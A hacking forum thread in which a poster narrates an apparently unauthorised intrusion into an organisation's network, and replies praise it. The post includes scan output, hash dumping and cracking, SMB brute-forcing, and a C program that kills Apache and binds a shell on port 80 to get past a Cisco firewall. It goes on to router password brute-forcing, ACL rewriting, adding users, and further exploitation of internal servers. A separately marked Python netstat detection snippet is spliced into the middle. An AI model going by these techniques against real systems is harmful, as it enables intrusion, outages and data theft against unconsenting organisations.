Bypassing a Cisco IOS firewall

12-11-2010, 03:19 AM
This documentation is about a successful attack strategy on something which I was trying out for the last 15 days. It all started with silent-poison handing over to me a webshell, "a non interactive .php shell", on a webserver; the shell was having NT-Authority System privileges. He did a good work there, as I was told he used a Joomla exploit to get that shell up and running. And it was obviously a high priority webserver. He should probably document that part :).

The issue he was facing was that he was not able to back connect nor use a bind shell to get an interactive command prompt. Well yes, it would definitely be because of a proxy/firewall/NATing issue.

Day 1:

All I am having is a web shell with privileges to execute commands; it was a Windows 2008 server. I started by doing an external nmap

fb1h2s@bktrack:~#nmap -T4 -A targetip

"which will generate a full scan including tracert and script scans"

Output was:

TCp Port : 80 Open

No filtered ports but just an open port, as normally if firewalled the Windows RPC ports would be filtered. Hmm, should be a router ACL configured with no outbound connections and only allowing inbound connections on port 80

For confirming, I uploaded a command line port-scanner, not nmap, as I am not having an interactive command prompt and configuring nmap+WinPcap on a non-interactive setup is hard, so didn't want to take that pain.

I uploaded Foundstone ScanLine v1.01 http://www.foundstone.com/us/resources/proddesc/scanline.htm and did banner grabbing on the device which is doing the NATing

ipconfig > found the device ip

sl -vbt

Starting scan against port range: 1-5000
Total number of maximum threads is 20. Socket timeout is set to 20ms.
Port 1720 is open.
-- End of open TCP ports list.

Cisco IOS firewall
Responded in 0 ms.
0 hops away
Responds with ICMP unreachable: No
TCP ports: 23 80 1720

Before starting I dumped the admin/user hashes using http://www.foofus.net/~fizzgig/fgdump/fgdump-usage.htm and cracked them online using https://www.objectif-securite.ch/en/products.php
Which by the way was Admin@internal-ip-last-octet; seems like I might have more chance for similar passwords :D

So the problem maker is a Cisco IOS firewall. So I have to bypass this one to get an interactive shell, RDP, command prompt etc. And the question is how??

Day 2

It took two days to build an option set.

[+] Few solutions I could think about were
[1] Get access to the firewall by brute-forcing the password or some other means and modify the access list to:

access-list 101 permit tcp any host eq 3389
[Hard? Impossible from a non-interactive shell] And the bruteforce program and all I will have to code in native C/C++, which I wasn't that fast in doing [I am in love with Python :)]

[2] Find another system in the network which might have internet access, like mail server, DNS servers; hack them, then tunnel the firewalled machine's traffic and take it out to the internet and get an interactive shell.

[3] DNS tunneling and port reuse http://www.blackhat.com/presentations/bh-usa-08/Miller/BH_US_08_Ty_Miller_Reverse_DNS_Tunneling_Shellcode.pdf Metasploit got DNS tunneling payloads. "You can't achieve a fully interactive shell"

And from these I chose the second option. So now I have to spot a system which might have direct internet access.

ipconfig /all gives me my internal DNS server IP.
I also did a portscan on my subnet which gave me the DNS names too
"DNS names changed"
Responded in 0 ms.
0 hops away
Responds with ICMP unreachable: No


Responded in 0 ms.
0 hops away
Responds with ICMP unreachable: No

Hostname: ipcam-client
Responded in 0 ms.
0 hops away
Responds with ICMP unreachable: No
Starting scan against port range: 1-5000
Total number of maximum threads is 50. Socket timeout is set to 3ms.
Port 22 is open.
Port 80 is open.
Port 443 is open.
Port 554 is open.
Port 2112 is open.
Port 3306 is open.
Port 4112 is open.
Port 4116 is open.
Port 4343 is open.
-- End of open TCP ports list.

Responded in 0 ms.
0 hops away
Responds with ICMP unreachable: No


Scan finished at Thu Nov 25 15:34:20 2010

Responded in 0 ms.
0 hops away
Responds with ICMP unreachable: No
TCP ports: 22 80 443 554 2112 3306 4112 4116 4343

Hostname: exch.my.target.com
Responds with ICMP unreachable: No
Responded in 0 ms.
1 hop away
Responds with ICMP unreachable: No
TCP ports: 21 25 53 80 88 110 135 139 143 389 443 445 464 593 636 993 995 1025 1027 1038 1054 1058 1060 1066 1069 1107 1111 1123 1129 1163 1201 1219 1801 2101 2103 2105 2107 3171 3172 3173 3268 3269 3389

12-11-2010, 03:22 AM
Seems like I spotted what I wanted: an Exchange mail server of the target with DNS name exch.my.target.com
And another good news is there is quite a huge no. of servers inside the network,
including a surveillance camera system and a 1 TB data server using "MYBOOKWORLD"
Hostname: ipcam-client "Let's come back to this later"

So now I knew the DNS name of their mail server;
till date I haven't seen an organization using 2 different DNS names for mail servers internal and external, so high possibility that we would be able to get the external IP address from this DNS name.

I typed in my browser the mail domain name exch.mytarget.com and yuhu, the target's Microsoft Exchange webmail login popped open :D. So now I have my target. Time to see if it's firewalled or not.

Nmap -T4 -A IP

12-11-2010, 03:23 AM

Fair enough, so now this would be the target to hack. A quick look up also revealed that the target mail server was also their domain controller :D how stupid is that. And what's the point in putting a firewall in front of the web server and not doing anything to this mail/domain server? Sad, but good for me.

Nmap's SMB bruter module gives good results. So if I could crack an account then I could use it to execute commands using PsTools

psexec -u user -p password \\marklap command

So did an nmap smb-brute and the good news was I got two successful logins

nmap --script smb-brute.nse -p445


And the bad news was that none of the users were privileged enough to get command execution :(.

I did a little more poking around with the mail server, found out the SNMP community string was public only, used Snmpenum, listed updates and checked if any was missing; that too didn't work.

12-11-2010, 03:24 AM
Trying to compromise it didn't succeed. And I got exhausted. See, my motive is to attain an interactive shell on that webserver. So I didn't spend more time with the mail server and started thinking about a different one.

[+] Plans 1, 2, 3 flopped for me, so need to make a new plan
[-] Current scenario is the NATing is taking place in the Cisco firewall, where connections are forwarded to the internal IP and the Cisco ACL is configured in such a way that:

access-list 101 permit tcp any host eq 80
--> allows connection on port 80
access-list 101 deny tcp any host eq any
--> deny any other connections on any other port

You could read a good doc about ACLs here http://www.cisco.com/en/US/tech/tk648/tk361/technologies_configuration_example09186a0080100548.shtml

[-] So connections to port 80 would be accepted and forwarded to the internal computer. As the webserver running Apache is using port 80, we can't bind a port on the 'in-use' port.

Somewhere I have read about a port reuse methodology,
didn't get it though.

12-11-2010, 03:24 AM

Most Stupid Idea

We can't use port 80 as it's being used by Apache, but if we could shut down Apache and make a command bind shell on port 80 then we could simply telnet to the server and get an interactive command prompt; the firewall won't even say a word :cool:.

Well my idea was dumb, but if that would satisfy my needs then that would be all enough.

Setting up the plan
1) Make a bind shell using Metasploit bound to the internal machine's IP on port 80
2) Make another program which will kill HTTP and call our bind shell and loop through the process so that we won't lose control over the web shell.
3) Make sure that my plan is working fine by testing/verifying it on a local machine. If anything goes wrong then we will end up with nothing.
4) And also execute the plan only at midnight when no traffic to that web server is there; verify that with netstat -a and do accordingly

[+] A small code to do the stuff was built

// stupid code by fb1h2s
// well not leet but idea works :D
#include <windows.h>   // WinExec, Sleep, SW_SHOWNORMAL
#include <stdlib.h>    // system

int main(int argc, char** argv)
{
    while (1)
    {
        system("taskkill /IM httpd.exe /F");   // kill http
        WinExec("bind.exe", SW_SHOWNORMAL);   // call windows bind shell on port 80
        Sleep(250000);  // let's hang out with the interactive command prompt for ~4 mins and try to compromise the firewall
        system("taskkill /IM bind.exe /F");    // kill bind shell
        WinExec("C:\\pathonwebserver\\apache\\bin\\httpd.exe", SW_SHOWNORMAL);
        // bring back http server, my work is done; let it continue after some time
    }
    return 0;
}
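
An added detection example (my code, not from the original post or its author): a small Python check that parses Windows "netstat -anob" output and flags a listening port whose owning executable is not the one expected for it, which is exactly the state the plan above creates when Apache is killed and bind.exe takes over port 80. The sample netstat output and the expected-owner policy are constructed for the example.

```python
import re

# Constructed "netstat -anob" sample: port 80 is now owned by bind.exe, not httpd.exe.
SAMPLE_NETSTAT = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       2316
 [bind.exe]
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       812
  RpcSs
 [svchost.exe]
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       1540
 [httpd.exe]
  TCP    10.0.0.5:49160         10.0.0.9:445           ESTABLISHED     4
 Can not obtain ownership information
"""

# Assumed policy: which executables may listen on which ports.
EXPECTED_OWNERS = {80: {"httpd.exe"}, 443: {"httpd.exe"}}

SOCKET_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+\S+\s+(\S+)\s+(\d+)\s*$")
OWNER_RE = re.compile(r"^\s*\[(.+?)\]\s*$")  # "-b" prints the owner as [exe.exe]

def parse_listeners(netstat_output):
    """Return [(port, pid, exe)] for every LISTENING TCP socket in the output."""
    listeners = []
    current = None
    for line in netstat_output.splitlines():
        m = SOCKET_RE.match(line)
        if m:
            proto, _addr, port, state, pid = m.groups()
            current = None
            if proto == "TCP" and state == "LISTENING":
                current = [int(port), int(pid), None]
                listeners.append(current)
            continue
        m = OWNER_RE.match(line)
        if m and current is not None and current[2] is None:
            current[2] = m.group(1)  # first bracketed line after the socket is its exe
    return [tuple(entry) for entry in listeners]

def unexpected_listeners(netstat_output, expected=EXPECTED_OWNERS):
    """Listeners on a policed port whose owning exe is not in the expected set."""
    return [(port, pid, exe) for port, pid, exe in parse_listeners(netstat_output)
            if port in expected and exe not in expected[port]]

if __name__ == "__main__":
    for port, pid, exe in unexpected_listeners(SAMPLE_NETSTAT):
        print(f"ALERT: port {port} is owned by {exe} (pid {pid}), not the expected web server")
```

On a real host the output would come from running netstat -anob with administrative rights and the check could be scheduled alongside a monitor for the web server process itself.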


12-11-2010, 03:25 AM
Once the code was built I tested it on my local system, all this with the assumption that a CBAC context based access list is in use http://www.cisco.com/en/US/docs/ios/11_3/feature/guide/firewall.html#wp8216 (normally it's CBAC only),
and everything worked fine.

Uploaded the bind shell and uploaded the winexec.exe binary, and all in place. I executed


Boom, Apache went down as planned and so did the webshell. Now I tried to telnet to port 80 of the target; screwed, nothing works, not getting any command prompt back. Waited for 5 mins to get back my HTTP server; that too didn't work. Screwed royally :rolleyes:

It's only after that I understood my stupidity
1) winexec.exe is called from the command line via php --> cmd.exe /winexec.exe
2) When winexec.exe executes it kills Apache, thereby php, and ends the calling terminal cmd.exe
3) so no call to bind.exe is made :(
4) when I tested on my local machine I only tested it by running the code manually, didn't call it from the webshell.

I could have planned and thought a little more. All I needed to do was make another program "callwinexec.exe" which called winexec.exe, and run "callwinexec.exe" from the webshell.
And the consequence of not doing that was that the webserver was down for 5 days. And I waited anxiously, checking every day whether the site was back up or not.

So back on the 9th day the server was up again.

Irresponsible admins, why would they need 5 days to restart Apache?

12-11-2010, 03:25 AM
Now the time for real woot woot,
Uploaded the programs to the server and triggered callwinexec.exe

Result was:

So a command prompt is achieved, and a quick bruteforce on the router's telnet was done. Remember I have mentioned the admin password of the webserver was Admin@ip-address-last-octet; the same stuff worked on the router too. That was quick :D. And I modified the access list, enabled any to any on the router. I used the http://www.cisco.com/en/US/tech/tk648/tk361/technologies_configuration_example09186a0080100548.shtml

And used Google to do most of the stuff.

So any to any access is granted and RDP was also available.
I had issues with logging in, as the webadmin had left an RDP session unclosed, so had to use this tutorial to get past it http://retrohack.com/killing-rdp-sessions-at-the-cmd-line/

And I did another stupid thing, that was installing Python for further exploitation, which was discovered by the admin the next day; he took down the server for maintenance for one day and changed the admin password, and also made the NT+LM hashes unavailable, but didn't figure out the router thing.

So the next day night I had to get a bind shell back, and as I didn't know the password and only NT hashes were available I had to use

net user user new password
net user /add


which still works on Windows Server 2008

to get a new user, and used Remote Desktop to connect to it. My aim was already completed but my curiosity of seeing the rest of the servers in the network made me install Nessus and Nmap on that server.

Nessus 4 will have issues with Flash via RDP, as you need to install a standalone version of Flash for IE to access Flash via RDP

As I already had made the list of alive IPs using Foundstone ScanLine on the very first days itself, I segregated the IP list and passed them to Nessus and nmap.

16th Day, that was yesterday
Owned 4 more servers inside using three different exploits.
I am not going into detail about that stuff because I am tired of writing + you could Google about them. Or will detail about the JBoss exploit in some other article.
1) MS08-067, used a public version of the code
2) JBoss console was there on another Win 2008 server, 0wned that too.
https://issues.jboss.org/browse/ASPATCH-126?page=com.atlassian.jira.plugin.system.issuetabpanels%3Achangehistory-tabpanel
3) Microsoft Windows SMB Shares Unprivileged Access
4) Password brute force Admin@ip worked on another machine too.

I was hacking like a mad ass for the last 15 days. Though my primary target inside was a Cisco VOSM surveillance camera management server, I could not reach there. It was a Linux machine and I am not that good at remotely exploiting Linux.

And today I got a confirmation from the Null Con folks confirming that my paper on "Penetration testing Biometric system" was selected, so had to work on that and won't be able to continue with this one. So just thought of documenting the work so it will save someone else's time in places where I lagged.

And I am thanking all the good fellow hackers of Garage4hackers and others whom I bugged these days asking my doubts, who all helped me out in circumstances.
B0nd, Eberly, wipu, webd3vil, sagar.belure, vinnu and
greetz to garage members: silenpoison (special one for starting it), w4ri0r, empty, neo, Rohith, Sids786, d4rkest, SmartKD, Ti a, h@xor, Atul, prasant, micro, nishant.
And obviously to my sweet girlfriend who calls me busy geek and knows that I am not a good BF, but still loves me.

I always add this greetz part to whatever I post :)

PDF Version Attached:

12-11-2010, 05:58 AM
Yeah fb. A couple of days back empty told me about your idea of stopping the web server and running your own code, as only the web port was allowed through the firewall. That part I found deadly!!!

You fall under the category of "determined hackers" and it is just next to impossible to stop such brains :)

12-11-2010, 10:47 AM
EPIC ..... this topic is bookmarked for reference ... One of the most epic posts in garage

12-11-2010, 11:07 AM
Mind-blowing :)..really, fb1h2s is a "determined hacker" ;)

12-11-2010, 12:32 PM
Great idea and determination to achieve the goal. That's what a true hacker is.

12-11-2010, 01:08 PM
good one bro :)
Very well exploited, and thanks for documenting it in such a gr8 way :D

12-11-2010, 02:03 PM
Whatever he shares is always innovative and gives something new to learn.. Hats off to you bro.. :)

12-11-2010, 09:35 PM
Awesome stuff Fb1, I am proud to be having a "deadly hacker" friend like you...

12-11-2010, 11:06 PM
@bond just inspired by you all guys :)
@all I just tried and tried and did it :)

12-12-2010, 05:33 PM
@fb1h2s Kudos to you, one of the most interesting articles I've ever read.. keep the good work up :)

12-12-2010, 10:21 PM
You really did a great job. The post was very interesting. I liked that callwinexec.exe part most. Thanks for sharing such experiences.

12-13-2010, 09:43 AM
Keep on man, you have delivered a marvelous approach. You have written a wizard to hack into systems remotely..."vinnu"

12-13-2010, 06:41 PM
Awesome work bro :) Keep it up, really very inspiring, that's the spirit of a true hacker. Kudos to you :D

12-13-2010, 06:56 PM
Amazing share..... bro you always rock....TFS :)

12-13-2010, 07:45 PM
bro I just love the way you document .... listing all the ideas and plans .. countering one with another .. this helps so much !! :)
Keep rocking !!

01-24-2011, 12:53 PM
There is a bit of confusion in your story....

when you say you have dumped the password hashes using fgdump and cracked them. My question to you is very simple. How did you dump the hashes with fgdump, because fgdump asks you for the administrative privileged account password for dumping the hashes.

So, if you already knew the administrator password, why did you crack it?
How did fgdump work without providing the password???

01-24-2011, 04:13 PM
If you check the second line of my post I have mentioned
a webshell, "a non interactive .php shell", on a webserver; the shell was having NT-Authority System privileges. NT-Authority System is the system account which holds more power than Admin accounts; if we could run code in the context of an installed admin service this is possible :) here php helped in attaining system access.

Nice thought though.

01-25-2011, 09:17 PM
If you check the second line of my post I have mentioned NT-Authority System privileges. NT-Authority System is the system account which holds more power than Admin accounts; if we could run code in the context of an installed admin service this is possible :) here php helped in attaining system access.

Nice thought though.

Got you...! :)

01-27-2011, 11:28 PM
Like master like follower........ it's just FB1's version of B0nd's Boot to Remote Root. I am not comparing anything here... but what I see is you both share the same passion when it comes to hacking...

awesome...... and I was one of those luckiest persons who were there not to read but to listen to this idea... watch this idea live....... I felt so enlightened and inspired that I can not explain it in words..... I won't say awesome share, or keep it up or anything... all I have for these guys is a big FAT THANK YOU....

06-27-2011, 01:06 AM
Thanks for sharing dude, it's worth appreciating

06-19-2012, 10:28 AM
mate, awesome post, but this should be private so only registered members can see it.... it also solved my problems too..... thanx

06-19-2012, 10:28 AM
Are you working in an InfoSec company or are you doing it all alone?

06-23-2012, 11:18 PM
This music is totally dedicated to fb1h2s

You Are Fucking Awesome!! - YouTube (http://www.youtube.com/watch?v=zkJSBv6Tj0E)

Can't write the feelings in letters..:D so expressed it via YouTube..:|